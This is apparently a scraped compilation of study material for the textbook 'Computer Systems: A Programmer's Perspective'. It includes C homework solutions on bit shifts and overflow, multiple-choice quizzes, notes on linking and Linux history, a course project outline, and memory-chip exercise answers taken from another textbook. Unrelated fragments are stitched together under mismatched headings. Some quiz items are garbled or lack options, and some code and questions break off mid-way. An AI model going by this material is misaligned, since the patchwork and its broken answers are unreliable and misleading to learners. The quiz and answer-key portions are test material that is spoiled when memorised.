Computer Systems: A Programmer's Perspective (2nd Edition): Homework, Chapter 7


Computer Systems: A Programmer's Perspective (2nd Edition): Homework Answers

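    int int_shifts_are_arithmetic(void)
    {
        int x = -1;
        return (x >> 1) == -1;
    }

2.63 For sra, the main job is to extend bit w-k-1 of xsrl (the position where the original sign bit lands) into the higher-order bits.

This can be done with an "invert and add 1" step, except that the value added is 1<<(w-k-1) rather than 1.

If bit w-k-1 of xsrl is 0, the bits above it are all 0 after the invert-and-add; if it is 1, they are all 1.

A mask then keeps those high-order bits and combines them with the low-order bits of xsrl.

For srl, the main job is to clear the high-order bits, that is, xsra & ((1<<(w-k)) - 1).

Note that when k==0 the expression 1<<(w-k) is a shift by the full word width, which C leaves undefined, so the code uses 2<<(w-k-1) instead, computed as an unsigned value so that it wraps to 0.

    int sra(int x, int k)
    {
        int xsrl = (unsigned) x >> k;
        int w = sizeof(int) << 3;
        unsigned z = 1u << (w - k - 1);
        unsigned mask = z - 1;
        unsigned right = mask & xsrl;
        unsigned left = ~mask & (~(z & xsrl) + z);
        return left | right;
    }

    unsigned srl(unsigned x, int k)
    {
        int xsra = (int) x >> k;
        int w = sizeof(int) * 8;
        unsigned z = 2u << (w - k - 1);
        return (z - 1) & xsra;
    }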
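The sra and srl routines for problem 2.63 can be checked against reference results. The sketch below is only an illustration: `ref_sra` and `check_shifts` are names invented here, the code assumes a 32-bit `int`, and `srl` additionally assumes that the compiler shifts signed values arithmetically (the premise of the exercise, and implementation-defined in C).

```c
#include <assert.h>
#include <limits.h>

/* Arithmetic right shift built from a logical one; assumes 0 <= k < w. */
int sra(int x, int k)
{
    unsigned xsrl = (unsigned)x >> k;
    int w = sizeof(int) << 3;
    unsigned z = 1u << (w - k - 1);            /* where the sign bit lands */
    unsigned mask = z - 1;                     /* bits below that position */
    unsigned left = ~mask & (~(z & xsrl) + z); /* all 1s or all 0s on top */
    return (int)(left | (mask & xsrl));
}

/* Logical right shift built from an arithmetic one; assumes 0 <= k < w. */
unsigned srl(unsigned x, int k)
{
    int xsra = (int)x >> k;          /* assumed arithmetic, as in the exercise */
    int w = sizeof(int) << 3;
    unsigned z = 2u << (w - k - 1);  /* 1u << (w-k), wrapping to 0 when k == 0 */
    return (z - 1) & (unsigned)xsra;
}

/* Reference: floor(x / 2^k) in 64-bit arithmetic, with no signed shift. */
int ref_sra(int x, int k)
{
    long long d = 1LL << k;
    long long q = x / d;
    if (x % d != 0 && x < 0)
        q -= 1;                      /* C division truncates; round down instead */
    return (int)q;
}

/* Returns the number of mismatches over a few edge-case inputs. */
int check_shifts(void)
{
    static const int samples[] = { 0, 1, -1, 5, -5, 0x12345678, INT_MAX, INT_MIN };
    int w = sizeof(int) << 3;
    int bad = 0;
    for (unsigned i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        for (int k = 0; k < w; k++) {
            int x = samples[i];
            if (sra(x, k) != ref_sra(x, k))
                bad++;
            if (srl((unsigned)x, k) != ((unsigned)x >> k))
                bad++;
        }
    }
    return bad;
}
```

Calling `check_shifts()` from a test driver should report zero mismatches under the stated assumptions; the k == 0 and k == w-1 cases are the ones most likely to expose a mask bug.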

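Companion Practice Quiz for Computer Systems: A Programmer's Perspective

Chapter 1

1.1.0 The ASCII code of the letter a is 97. What is the sum of the ASCII codes of the letters in love? ( )
A. 99  B. 520  C. 438  D. 360

1.2.0_1 During compilation, which file does hell.c yield after the assembly phase? ( )
A. hell.i  B. hell.s  C. hell.o  D. hell.exe

1.2.0_2 During compilation, hell.c yields hell.s after the ( ) phase.
A. Preprocessing  B. Compilation  C. Assembly  D. Linking

1.4.1 Which of the following is not an I/O device?
A. Mouse  B. Display  C. Keyboard  D. The book Computer Systems: A Programmer's Perspective

1.4.2 Can data travel from disk to main memory without passing through the processor? And what is DMA?
A. Yes; direct memory access  B. Yes; dynamic memory access  C. No; direct memory access  D. No; dynamic memory access

Chapter 2

2.1.1_1 The hexadecimal number corresponding to the binary string 11010110 is ( )
A. 0xx0  B. 0xD6  C. 0XC6  D. 0Xd5

2.1.1_2 The decimal number corresponding to hexadecimal 0x77 is ( )
A. 77  B. 117  C. 109  D. 119

2.1.3 On a 32-bit machine, the size of char * in bytes is ( )
A. 1  B. 2  C. 4  D. 8

2.1.4_1 On a little-endian machine, the high-order byte of the number 0x123678 is ( )
A. 0x12  B. 0x21  C. 0x78  D. 0x87

2.1.4_2 The number 0x1234 is read from a little-endian machine and stored on a big-endian machine. The high-order byte is now ( )
A. 0x12  B. 0x21  C. 0x34  D. 0x43

2.1.8 Given char a=0xdb, the value of ~a is ( )
A. 0xdb  B. 0xbd  C. 0x24  D. 0x42

2.1.8 Given int a=1, b=2, the result after evaluating a^=b^=a^=b is ( )
A. a=3, b=2  B. a=1, b=2  C. a=2, b=1  D. Unknown

2.1.10 Given int a = 3, the result of a<<3 is ( )
A. 3  B. 24  C. 12  D. 48

2.2.1 The minimum value of unsigned char is ( )
A. 128  B. 255  C. -127  D. 0

2.2.3 For 4-bit integer data, the two's-complement encoding of -5 is ( )
A. 1011  B. 1101  C. 0101  D. 1010

2.3.2 For 4-bit integer data with x=[1010] and y=[1100], the result of the two's-complement addition x+y is ( )
A. 1010  B. 0110  C. 1100  D. 10110

Chapter 3

3.2.2 The file generated by the command unix> gcc -O1 -C code.c corresponds to the result after the ( ) phase of compilation.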

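Companion Practice Quiz for Computer Systems: A Programmer's Perspective (Final Reviewed Draft)

Questions on Computer Systems: A Programmer's Perspective, by Li Yongwei (李永伟)

Chapter 1 Questions

What we usually call a "byte" consists of _____ binary bits.
A. 2  B. 4  C. 6  D. 8

The most central component of a microcomputer's hardware system is __.
A. Motherboard  B. CPU  C. Memory  D. I/O devices

The CPU contains a program counter (also called the instruction counter). It is used to store __.
A. The address of the next instruction to be fetched  B. The address of the memory location the CPU is currently accessing  C. Temporary results of ALU operations  D. The instruction currently being executed

Which of the following statements is correct?
A. The CPU can read data on the hard disk directly  B. The CPU can access main memory directly  C. The CPU consists of memory, an arithmetic unit and a control unit  D. The CPU is mainly used to store programs and data

The 32 in "32-bit microcomputer" refers to ( ).
A. The computer model  B. Memory capacity  C. Computing speed  D. Machine word size

Chapter 2 Questions

Evaluate the following expression and give the result in hexadecimal: 0x503c + 64 = ______
A. 0x507c  B. 0x507b  C. 0x506c  D. 0x506b

The decimal number 167 written in hexadecimal is ______
A. 0XB7  B. 0XA7  C. 0XB6  D. 0XA6

Bit-level operation: the result of 0x69 & 0x55 is _______
A. 0X40  B. 0X41  C. 0X42  D. 0X43

Logical operation: the result of !!0x41 in hexadecimal is _____
A. 0X00  B. 0X41  C. 0X14  D. 0X01

Shift operation: for the argument x, the result of x>>4 (arithmetic right shift) is ______
A. [01010000]  B. [00001001]  C.  D.

Truncation: suppose a 4-bit value (written with hex digits 0~F) is truncated to a 3-bit value (written with hex digits 0~7). The two's-complement value of [1011] after truncation is ___
A. -3  B. 3  C. 5  D. -5

Floating-point representation: when the number 5 is represented in floating point, the fraction field frac is interpreted as describing a fractional value f. Then f = ______
A. 1/2  B. 1/4  C. 1/8  D. 1/16

When the number 5 is represented in floating point, the exponent E = _____
A. 1  B. 2  C. 3  D. 4

When the number 5 is represented in floating point, the bit representation of the exponent field is ___
A. 2^(K-1)+1  B. 2^K+1  C. 2^(K-1)  D. 2^K

Floating-point arithmetic: the result of (3.14+1e10)-1e10 as computed by the machine is
A. 3.14  B. 0  C. 1e10  D. 0.0

Chapter 3 Questions

Compute the effective address denoted by the addressing mode Imm(Eb, Ei, s):
A. Imm + R[Eb] + R[Ei]*s  B. Imm + R[Eb] + R[Ei]  C. Imm + R[Eb]  D. Imm + R[Ei]

The following addressing form, M[R[Eb]], is _____
A. Immediate addressing  B. Register addressing  C. Absolute addressing  D. Indirect addressing

Assume the initial value %dh=CD. What is the value of %eax after executing the following instruction? MOVB %DH, %AL
A. %eax = 987654CD  B. %eax = CD765432  C. %eax = FFFFFFCD  D. %eax = 000000CD

Assume the initial value %dh=CD. What is the value of %eax after executing the following instruction? MOVSBL %DH, %EAX
A. %eax = 987654CD  B. %eax = CD765432  C. %eax = FFFFFFCD  D. %eax = 000000CD

Assume the initial value %dh=CD. What is the value of %eax after executing the following instruction? MOVZBL %DH, %EAX
A. %eax = 987654CD  B. %eax = CD765432  C. %eax = FFFFFFCD  D. %eax = 000000CD

Assume register %eax holds x and %ecx holds y. Give the value stored in register %edx by the following instruction: leal (%eax, %ecx), %edx
A. x  B. y  C. x + y  D. x - y

Assume register %eax holds x and %ecx holds y. Give the value stored in register %edx by the following instruction: leal 9(%eax, %ecx, 2), %edx
A. x + y + 2  B. 9*(x + y + 2)  C. 9 + x + y + 2  D. 9 + x + 2y

The condition code CF denotes ______
A. Zero flag  B. Sign flag  C. Overflow flag  D. Carry flag

The condition code OF denotes ______
A. Zero flag  B. Sign flag  C. Overflow flag  D. Carry flag

Running on a Pentium 4, our code needs about 16 clock cycles when the branch pattern is highly predictable and about 31 clock cycles when the pattern is random. Approximately what is the misprediction penalty?
A. 25  B. 30  C. 35  D. 40

Chapter 5 Questions

Pointer xp points to x and pointer yp points to y. The following procedure swaps the two values:

    void swap(int *xp, int *yp)
    {
        *xp = *xp + *yp;   /* x+y */
        *yp = *xp - *yp;   /* x+y-y = x */
        *xp = *xp - *yp;   /* x+y-x = y */
    }

Consider the case xp == yp. What value is stored at xp afterwards?
A. x  B. y  C. 0  D. Undetermined

The next three questions use the following functions:

    int min(int x, int y) { return x < y ? x : y; }
    int max(int x, int y) { return x < y ? y : x; }
    void incr(int *xp, int v) { *xp += v; }
    int square(int x) { return x * x; }

The following fragment calls these functions:

    for (i = min(x, y); i < max(x, y); incr(&i, 1))
        t += square(i);

Assume x equals 10 and y equals 100. The numbers of times the four functions min(), max(), incr() and square() are called are, in order,
A. 91 1 90 90  B. 1 91 90 90  C. 1 1 90 90  D. 90 1 90 90

The following fragment calls these functions:

    for (i = max(x, y) - 1; i >= min(x, y); incr(&i, -1))
        t += square(i);

Assume x equals 10 and y equals 100. The numbers of times the four functions min(), max(), incr() and square() are called are, in order,
A. 91 1 90 90  B. 1 91 90 90  C. 1 1 90 90  D. 90 1 90 90

The following fragment calls these functions:

    int low = min(x, y);
    int high = max(x, y);
    for (i = low; i < high; incr(&i, 1))
        t += square(i);

Assume x equals 10 and y equals 100. The numbers of times the four functions min(), max(), incr() and square() are called are, in order,
A. 91 1 90 90  B. 1 91 90 90  C. 1 1 90 90  D. 90 1 90 90

The next three questions share one setup. Suppose a function has several variants that preserve its behavior but have different performance characteristics. For three of them, the running time (in clock cycles) can be approximated by the following functions: version 1: 60+35n; version 2: 136+4n; version 3: 157+1.25n.

When n=2, which version is fastest?
A. 1  B. 2  C. 3  D. Cannot be compared

When n=5, which version is fastest?
A. 1  B. 2  C. 3  D. Cannot be compared

When n=10, which version is fastest?
A. 1  B. 2  C. 3  D. Cannot be compared

Consider the following function:

    double poly(double a[], double x, int degree)
    {
        long int i;
        double result = a[0];
        double xpwr = x;
        for (i = 1; i <= degree; i++) {
            result += a[i] * xpwr;
            xpwr = x * xpwr;
        }
        return result;
    }

When degree = n, how many additions and how many multiplications does this code perform?
A. n, n  B. 2n, n  C. n, 2n  D. 2n, 2n

A driver hauls a truckload of goods from point A to point B, a total distance of 2500 km.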
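The aliasing case in the Chapter 5 swap question above can be traced in code. This is a small sketch, with `swap_arith` and `swap_aliased_result` as names chosen here for illustration: when both pointers refer to the same int, the first statement doubles the value and the second subtracts it from itself.

```c
#include <assert.h>

/* Arithmetic swap from the quiz; correct only when xp and yp differ. */
void swap_arith(int *xp, int *yp)
{
    *xp = *xp + *yp;   /* x + y */
    *yp = *xp - *yp;   /* (x + y) - y = x */
    *xp = *xp - *yp;   /* (x + y) - x = y */
}

/* Runs the swap with both pointers aimed at one int and returns what is left. */
int swap_aliased_result(int x)
{
    int v = x;
    swap_arith(&v, &v);   /* v = 2x, then v = 2x - 2x = 0, then v = 0 - 0 */
    return v;
}
```

For small inputs (so that x + x does not overflow), `swap_aliased_result` returns 0 regardless of x, which is why optimizers cannot treat `*xp` and `*yp` as independent without knowing the pointers differ.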

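Computer Operating Systems Tutorial (2nd Edition), Chapter 7

Chapter 7: Introduction to the Linux Operating System
The University of California at Berkeley was one of the academic users. There, UNIX was used extensively by the Computer Systems Research Group (CSRG), which modified it and thereby produced a major UNIX family: the Berkeley Software Distribution (BSD) UNIX. Apart from the UNIX line supplied by AT&T, BSD is the most influential UNIX family. BSD added many notable features to UNIX, such as TCP/IP networking and the improved Unix File System (UFS), and it improved AT&T's memory management code. Driven by user demand and user programming, BSD-style UNIX was generally more innovative than AT&T's UNIX and also improved more quickly.
(4) Robustness and Security. Linux must be robust and stable; the system itself should be free of defects, and it should protect processes (users) from interfering with one another. An important factor behind Linux's robustness and security is its open development process, which can be seen as a broad and rigorous form of review. Every line of code and every change in the kernel is quickly examined by countless programmers around the world. Some programmers focus specifically on finding and reporting potential defects. Defects missed by earlier reviews can be located and fixed through their efforts, and the fixes are merged into the main development tree so that everyone benefits.
open, and is a standards-compliant 32-bit (64-bit on 64-bit CPUs) operating system. Linux has the features expected of a modern operating system, for example: true preemptive multitasking; multi-user support; memory protection; virtual memory; symmetric multiprocessing (SMP); POSIX compliance; networking and a large set of network applications; graphical user interfaces and desktop environments (in fact there is more than one desktop environment); and the required speed and stability.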

Computer Systems: A Programmer's Perspective, Chapter 7

How Linkers Use Static Libraries to Resolve References
During the scan, the linker maintains a set E of relocatable object files that will be merged to form the executable, a set U of unresolved symbols, and a set D of symbols defined in previous input files. For each input file f on the command line, the linker determines if f is an object file or an archive. If f is an object file, the linker adds f to E, updates U and D to reflect the symbol definitions and references in f, and proceeds to the next input file. If f is an archive, the linker attempts to match the unresolved symbols in U against the symbols defined by the members of the archive. If some archive member, m, defines a symbol that resolves a reference in U, then m is added to E, and the linker updates U and D to reflect the symbol definitions and references in m. This process iterates over the member object files in the archive until a fixed point is reached where U and D no longer change. At this point, any member object files not contained in E are simply discarded and the linker proceeds to the next input file. If U is nonempty when the linker finishes scanning the input files on the command line, it prints an error and terminates. Otherwise it merges and relocates the object files in E to build the output executable file.
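The scan described above can be simulated in a few dozen lines. The following is only a toy model under stated assumptions: the types `Set`, `Obj` and `Input`, the function names, and the file and symbol names (main.o, libvector.a members, addvec, multvec) are all hypothetical, sets are small fixed-size arrays, and nothing here reflects how a real linker stores its tables.

```c
#include <assert.h>
#include <string.h>

#define MAXN 16   /* toy capacity; extra entries are silently dropped */

typedef struct { const char *items[MAXN]; int n; } Set;
typedef struct {
    const char *name;
    const char *defs[4];   /* NULL-terminated defined symbols */
    const char *refs[4];   /* NULL-terminated referenced symbols */
} Obj;
typedef struct { int is_archive; Obj members[4]; int nmembers; } Input;

static int has(const Set *s, const char *x)
{
    for (int i = 0; i < s->n; i++)
        if (strcmp(s->items[i], x) == 0)
            return 1;
    return 0;
}

static void add(Set *s, const char *x)
{
    if (!has(s, x) && s->n < MAXN)
        s->items[s->n++] = x;
}

static void del(Set *s, const char *x)
{
    for (int i = 0; i < s->n; i++)
        if (strcmp(s->items[i], x) == 0) {
            s->n--;
            s->items[i] = s->items[s->n];
            return;
        }
}

/* Add object o to E, then update D and U from its definitions and references. */
static void take(const Obj *o, Set *E, Set *U, Set *D)
{
    add(E, o->name);
    for (int i = 0; i < 4 && o->defs[i]; i++) { add(D, o->defs[i]); del(U, o->defs[i]); }
    for (int i = 0; i < 4 && o->refs[i]; i++)
        if (!has(D, o->refs[i]))
            add(U, o->refs[i]);
}

/* Does o define any symbol that is currently unresolved? */
static int resolves(const Obj *o, const Set *U)
{
    for (int i = 0; i < 4 && o->defs[i]; i++)
        if (has(U, o->defs[i]))
            return 1;
    return 0;
}

/* Scans inputs left to right; returns how many symbols remain unresolved. */
int link_scan(const Input *in, int n, Set *E, Set *U, Set *D)
{
    for (int f = 0; f < n; f++) {
        if (!in[f].is_archive) {
            take(&in[f].members[0], E, U, D);
            continue;
        }
        int changed = 1;
        while (changed) {                 /* iterate to a fixed point */
            changed = 0;
            for (int m = 0; m < in[f].nmembers; m++) {
                const Obj *o = &in[f].members[m];
                if (!has(E, o->name) && resolves(o, U)) {
                    take(o, E, U, D);
                    changed = 1;
                }
            }
        }
    }
    return U->n;
}

/* Hypothetical inputs: main.o references addvec, which lives in an archive. */
int demo_unresolved(int archive_first)
{
    Input main_o = { 0, { { "main.o", { "main" }, { "addvec" } } }, 1 };
    Input libvec = { 1, { { "addvec.o", { "addvec" }, { 0 } },
                          { "multvec.o", { "multvec" }, { 0 } } }, 2 };
    Input order[2];
    order[0] = archive_first ? libvec : main_o;
    order[1] = archive_first ? main_o : libvec;
    Set E = { { 0 }, 0 }, U = { { 0 }, 0 }, D = { { 0 }, 0 };
    return link_scan(order, 2, &E, &U, &D);
}
```

In this model `demo_unresolved(0)` leaves nothing unresolved, while `demo_unresolved(1)` leaves addvec unresolved because U was still empty when the archive was scanned, which is the usual reason libraries are placed after the object files that use them.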

Computer Systems: A Programmer's Perspective (2nd Edition): Detailed Homework Solutions

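    int saturating_add(int x, int y)
    {
        int w = sizeof(int) << 3;
        int t = x + y;
        int ans = x + y;
        x >>= (w - 1);
        y >>= (w - 1);
        t >>= (w - 1);
        int pos_ovf = ~x & ~y & t;
        int neg_ovf = x & y & ~t;
        int novf = ~(pos_ovf | neg_ovf);
        return (pos_ovf & INT_MAX) | (novf & ans) | (neg_ovf & INT_MIN);
    }

2.74 For signed subtraction t = a - b, the overflow rules can be summarized as follows. If a and b have the same sign, overflow cannot occur.

If a >= 0 && b < 0, overflow occurs only when t <= 0.

If a < 0 && b >= 0, overflow occurs only when t >= 0.

However, t can never equal 0 in these cases, because when a and b have different signs: 1) a != b, so a - b is not 0.

2) |a - b| <= abs(a) + abs(b) <= abs(TMax) + abs(TMin) = 2^w - 1, so the true difference is too small to wrap all the way around to 0. Therefore overflow occurs exactly when a and b have different signs and t has the same sign as b.

    int tsub_ovf(int x, int y)
    {
        int w = sizeof(int) << 3;
        int t = x - y;
        x >>= (w - 1);
        y >>= (w - 1);
        t >>= (w - 1);
        return (x != y) && (y == t);
    }

As an aside, here is a summary of how CF and OF are set in assembly (my own summary; corrections are welcome).

    t = a + b;
    CF: (unsigned) t < (unsigned) a                            carry flag
    OF: ((a<0) == (b<0)) && ((t<0) != (a<0))
    t = a - b;
    CF: (a>=0 && b<0) || (((a<0) == (b<0)) && t<0)             borrow flag, same as (unsigned) a < (unsigned) b
    OF: ((a<0) != (b<0)) && ((b<0) == (t<0))

In assembly, unsigned and signed arithmetic set the condition codes (flags) in the same way; what differs is which flags the unsigned and signed comparisons consult to produce their result.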
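The flag rules for t = a + b and t = a - b can be cross-checked against wider arithmetic. The sketch below is illustrative only: `Flags`, `add_flags`, `sub_flags`, `sub_flags_by_sign` and `rules_agree` are names introduced here, the borrow is computed as (unsigned) a < (unsigned) b, and the conversion of an out-of-range unsigned value back to `int32_t` is assumed to wrap (implementation-defined in C, but the common behavior).

```c
#include <assert.h>
#include <stdint.h>

typedef struct { int cf, of; } Flags;

/* Flags after t = a + b, derived from 64-bit arithmetic. */
Flags add_flags(int32_t a, int32_t b)
{
    Flags f;
    uint64_t usum = (uint64_t)(uint32_t)a + (uint32_t)b;
    int64_t ssum = (int64_t)a + b;
    f.cf = usum > UINT32_MAX;                      /* unsigned carry out */
    f.of = ssum > INT32_MAX || ssum < INT32_MIN;   /* signed overflow */
    return f;
}

/* Flags after t = a - b, derived from 64-bit arithmetic. */
Flags sub_flags(int32_t a, int32_t b)
{
    Flags f;
    int64_t sdiff = (int64_t)a - b;
    f.cf = (uint32_t)a < (uint32_t)b;              /* unsigned borrow */
    f.of = sdiff > INT32_MAX || sdiff < INT32_MIN;
    return f;
}

/* The same subtraction flags, computed only from the signs of a, b and t. */
Flags sub_flags_by_sign(int32_t a, int32_t b)
{
    Flags f;
    int32_t t = (int32_t)((uint32_t)a - (uint32_t)b);   /* wraparound difference */
    f.cf = (a >= 0 && b < 0) || (((a < 0) == (b < 0)) && t < 0);
    f.of = ((a < 0) != (b < 0)) && ((b < 0) == (t < 0));
    return f;
}

/* Returns 1 if both subtraction rules agree on a grid of edge cases. */
int rules_agree(void)
{
    static const int32_t v[] = { 0, 1, -1, 3, -3, 5, -5, INT32_MAX, INT32_MIN };
    int n = (int)(sizeof v / sizeof v[0]);
    for (int i = 0; i < n; i++)
        for (int j = 0; j < n; j++) {
            Flags x = sub_flags(v[i], v[j]);
            Flags y = sub_flags_by_sign(v[i], v[j]);
            if (x.cf != y.cf || x.of != y.of)
                return 0;
        }
    return 1;
}
```

A quick sanity case: 0 - (-1) borrows as an unsigned operation (0 < 0xFFFFFFFF) but does not overflow as a signed one, while INT32_MIN - 1 overflows without borrowing.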

Computer Systems: A Programmer's Perspective (2nd Edition): Exercise Answers

Computer Systems: A Programmer's Perspective
Instructor's Solution Manual
Randal E. Bryant, David R. O'Hallaron
December 4, 2003
Copyright © 2003, R. E. Bryant, D. R. O'Hallaron. All rights reserved.

    void show_long(long int x)
    {
        show_bytes((byte_pointer) &x, sizeof(long));
    }

    void show_double(double x)
    {
        show_bytes((byte_pointer) &x, sizeof(double));
    }

code/data/show-ans.c
Problem 2.41 Solution: There are many ways to solve this problem. The basic idea is to create some multibyte datum with different values for the most and least significant bytes. We then read byte 0 and determine which byte it is. The following solution creates an int with value 1. We then access its first byte and convert it to an int. This byte will equal 0 on a big-endian machine and 1 on a little-endian machine.
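The idea described for Problem 2.41 can be written out as follows. This is a minimal sketch rather than the manual's own listing: `first_byte_of` is a helper added here for illustration, and the second check assumes a 4-byte `unsigned`.

```c
#include <assert.h>

/* Returns 1 on a little-endian machine, 0 on a big-endian one. */
int is_little_endian(void)
{
    int x = 1;                            /* MSB = 0, LSB = 1 */
    return (int)(*(unsigned char *)&x);   /* byte at the lowest address */
}

/* Reports which byte of value is stored at the lowest address. */
int first_byte_of(unsigned value)
{
    return (int)(*(unsigned char *)&value);
}
```

On a little-endian machine `first_byte_of(0x11223344u)` yields 0x44, the least significant byte; on a big-endian machine it yields 0x11.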

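Course Project for Computer Systems: A Programmer's Perspective, 2nd Edition

Background

Operating systems is one of the important courses in computer science education.

The classic textbook Computer Systems: A Programmer's Perspective, 2nd Edition provides a systematic learning framework that covers all the key concepts of computer systems, from hardware to the operating system to application programs.

Through clear language, detailed explanations and a wide range of examples, it covers program development, memory management, virtual memory, network communication, operating systems and processors, so that students gain a full understanding of computer performance and design.

To further strengthen students' theoretical knowledge and practical skills, we wrote this course project around Computer Systems: A Programmer's Perspective, 2nd Edition. Its aim is to have students design real system modules in order to understand computer systems in depth and improve their operating system and programming skills.

Course Project Goals

•Understand the key concepts of computer systems in depth, including process management, memory management, file systems, network communication and processors.

•Learn how to do system-level programming in C and understand how low-level code is written.

•Improve students' ability to design and develop system programs for real problems.

Project Content

Project 1: Virtual Memory Management System

•Understand the concept of virtual memory and how it is implemented.

•Learn how to implement a virtual memory management system, including page replacement algorithms, page fault handling and virtual address mapping.

•Design a simple virtual memory management system and implement its code.

Project 2: Multi-Process File Sharing

•Understand the concept of multi-process file sharing and how it is implemented.

•Learn how to create child processes with the fork system call and how to read and write a file concurrently.

•Design a simple multi-process file sharing system and implement its code.

Project 3: Processor Scheduler

•Understand the concept of a processor scheduler and how it is implemented.

•Learn how to implement a processor scheduler, including process state transitions, priority-based scheduling and round-robin time slicing.

•Design a simple processor scheduler and implement its code.

Project Requirements

•Each project must include at least an algorithm module and a code implementation, and must be written in C.

•To verify correctness, each project must come with test cases designed by the student.

•At the end of the course, the source code and report documents of all projects will be collected.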

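Reading Summary and Excerpts: Computer Systems: A Programmer's Perspective

Preface

Computer Systems: A Programmer's Perspective is worth reading for every programmer; after finishing it you will have an intuitive picture of the whole computer system.

Chapter 1: A Tour of Computer Systems

Files that consist only of ASCII characters are called text files; all other files are called binary files.

C is quirky and flawed, but it is also an enormous success. Why did it succeed? C is closely tied to the Unix operating system; C is small and simple; C was designed for practical purposes.

There are some important reasons why programmers need to know how the compilation system works: optimizing program performance, understanding link-time errors, and avoiding security holes.

The shell is a command-line interpreter: it prints a prompt, waits for a command line to be typed, and then executes that command.

If the first word of the command line is not a built-in shell command, the shell assumes it is the name of an executable file and loads and runs that file.

Running throughout the system is a collection of electrical conduits called buses.

I/O devices are the system's connection to the external world.

Main memory is a temporary storage device that holds the program and the data it manipulates while the processor is executing the program.

The processor is the engine that interprets (or executes) instructions stored in main memory.

Using direct memory access, data can travel from disk to main memory without passing through the processor.

By keeping data that is likely to be accessed often in the cache, most memory operations can be carried out in the fast cache.

The storage devices in every computer system are organized as a memory hierarchy.

The operating system has two primary purposes: to protect the hardware from misuse by runaway applications, and to provide applications with simple, uniform mechanisms for manipulating complicated and often wildly different low-level hardware devices.

The operating system achieves both goals through its fundamental abstractions (processes, virtual memory and files).

Files are abstractions for I/O devices, virtual memory is an abstraction for both main memory and disk I/O devices, and processes are abstractions for the processor, main memory and I/O devices.

A process is the operating system's abstraction for a running program.

Processes running concurrently means that the instructions of one process are interleaved with the instructions of another.

The mechanism by which the operating system performs this interleaving is called context switching.

The operating system keeps track of all the state information a process needs in order to run.

This state is known as the context.

When the operating system decides to transfer control from the current process to some new process, it performs a context switch: it saves the context of the current process, restores the context of the new process, and then passes control to the new process.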

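Chapter 7 Exercise Answers

Chapter 7 exercise answers (2nd edition of the book): 2(4), 2(5), 2(9), 2(10) -- (omitted); 6, 17, 23, 24 (all data in the tables are in hexadecimal)

6. A computer already has a ROM region at 0000H-7FFFH. A 32K×8-bit storage region is now to be built from 8K×4-bit RAM chips. The CPU address bus is A0-A15, the data bus is D0-D7, and the control signals are R/W# (read/write) and MREQ# (memory request).

Describe the address decoding scheme and draw the connections between the ROM chip, the RAM chips and the CPU.

Suppose all other conditions stay the same but the CPU has 24 address lines, the address range 000000H-007FFFH is the ROM region, and the entire remaining address space is populated with 8K×4-bit RAM chips. How many such RAM chips are needed?

Reference answer: The CPU has 16 address lines, so the memory address space is 0000H-FFFFH, of which 8000H-FFFFH is the RAM region. That is 2^15 = 32K locations, or 32KB, so the number of 8K×4-bit chips needed is 32KB / (8K×4 bits) = 4×2 = 8.

Because the ROM region is 0000H-7FFFH and the RAM region is 8000H-FFFFH, the two can be distinguished by the top address bit A15: when A15 is 0 the ROM chip is selected, and when it is 1 the RAM chips are selected. In the latter case A14 and A13 are decoded into 4 signals, which serve as the chip-select signals for the 4 word-expansion groups; each group consists of 2 chips placed side by side to supply all 8 data bits.

(Figure omitted; see Figure 4.15.) If the CPU has 24 address lines and the ROM region is 000000H-007FFFH, the ROM region is 32KB and the total space is 16MB = 2^14 KB = 512×32KB, so the RAM region is 511×32KB. The number of RAM chips required is 511×32KB / (8K×4 bits) = 511×4×2 = 4088.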
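The two chip counts in the answer to exercise 6 follow the same arithmetic: word expansion (RAM bytes divided by words per chip) times bit expansion (8 data bits divided by bits per chip). A small sketch, with `ram_bytes` and `chips_needed` as function names chosen here for illustration:

```c
#include <assert.h>

/* Bytes left for RAM once the ROM region is removed from the address space. */
unsigned long ram_bytes(unsigned addr_lines, unsigned long rom_bytes)
{
    return (1UL << addr_lines) - rom_bytes;
}

/* Chips needed to build `bytes` of 8-bit-wide memory from chips that hold
   chip_words words of chip_bits bits each. */
unsigned long chips_needed(unsigned long bytes, unsigned long chip_words,
                           unsigned chip_bits)
{
    unsigned long per_group = 8 / chip_bits;    /* bit expansion: chips side by side */
    unsigned long groups = bytes / chip_words;  /* word expansion: groups stacked */
    return groups * per_group;
}
```

With 16 address lines and a 32KB ROM this gives 4 groups of 2 chips, 8 in total; with 24 address lines it gives 2044 groups of 2 chips, 4088 in total.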

17. Suppose a computer's main memory address space is 64MB and is byte-addressed.

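Computer Systems: A Programmer's Perspective: Homework Answers

2) |a - b| <= abs(a) + abs(b) <= abs(TMax) + abs(TMin) = 2^w - 1, so overflow can be identified by a and b having different signs while t and b have the same sign.

See Chapter 3 for details.

From 2-18 it is not hard to derive (x'*y')_h = (x*y)_h + x(w-1)*y + y(w-1)*x, where x' and y' are the unsigned interpretations of x and y, the subscript h denotes the high-order w bits of the product, and x(w-1) and y(w-1) are the sign bits.

    unsigned unsigned_high_prod(unsigned x, unsigned y){
        int w = sizeof(int)<<3;

A. False. A float can exactly represent only those integers whose highest 1 bit and lowest 1 bit are fewer than 24 bit positions apart.

So when x == TMax, float cannot represent it exactly, whereas double can represent every 32-bit integer exactly.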
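The float versus double claim can be observed directly. The sketch below assumes a 32-bit `int` and IEEE 754 single and double precision; `exact_in_float` and `exact_in_double` are names chosen here, and the comparison is done in double so that no out-of-range float-to-int conversion is ever performed.

```c
#include <assert.h>
#include <limits.h>

/* 1 if x is exactly representable as a float (24-bit significand). */
int exact_in_float(int x)
{
    volatile float f = (float)x;     /* volatile forces rounding to float */
    return (double)f == (double)x;
}

/* 1 if x is exactly representable as a double (53-bit significand). */
int exact_in_double(int x)
{
    volatile double d = (double)x;
    return (long long)d == (long long)x;
}
```

Under those assumptions, 2^24 and TMin are exact in float because each has a single 1 bit, while 2^24 + 1 and TMax are not; every int passes the double check.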

Computer Systems: A Programmer's Perspective: Answers (Ultra HD Electronic Edition)

Computer Systems: A Programmer's Perspective
Instructor's Solution Manual
Randal E. Bryant, David R. O'Hallaron
December 4, 2003
Copyright © 2003, R. E. Bryant, D. R. O'Hallaron. All rights reserved.

Chapter 1 Solutions to Homework Problems

The text uses two different kinds of exercises:

Practice Problems. These are problems that are incorporated directly into the text, with explanatory solutions at the end of each chapter. Our intention is that students will work on these problems as they read the book. Each one highlights some particular concept.

Homework Problems. These are found at the end of each chapter. They vary in complexity from simple drills to multi-week labs and are designed for instructors to give as assignments or to use as recitation examples.

This document gives the solutions to the homework problems.

1.1 Chapter 1: A Tour of Computer Systems

1.2 Chapter 2: Representing and Manipulating Information

